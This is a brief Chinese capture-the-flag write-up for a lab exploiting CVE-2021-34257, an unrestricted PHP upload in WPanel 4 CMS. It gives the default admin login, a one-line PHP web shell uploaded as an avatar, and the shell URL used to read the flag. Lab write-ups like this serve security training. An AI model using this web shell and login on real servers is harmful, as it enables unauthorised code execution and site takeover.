春秋云镜 CVE-2021-34257 WPanel4-CMS Authenticated RCE漏洞
靶标介绍
WPanel是一个用于构建博客、网站和网络应用程序的CMS。
WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传到 (1) 仪表板的头像图像、(2) 帖子文件夹图像、(3) 页面文件夹图像和 (4) 画廊文件夹图片。。
启动场景
漏洞利用
进入管理后台
http://eci-2zehgoxuevp3k040lroz.cloudeci1.ichunqiu.com/index.php/admin/login
登录默认账号admin@admin.com/admin,“Manage my profile”上传木马
“Avatar image” 上传一句话木马<?php system($_GET[cmd]);?>
右键点击图片,打开shell文件,执行命令。
http://eci-2zehgoxuevp3k040lroz.cloudeci1.ichunqiu.com/media/avatar/a98b017fcf08e1e4e5437bf186d5bf14.php?cmd=cat%20/flag
flag{6fc07b10-4a6c-41ee-a27e-18a421fc9b6f}
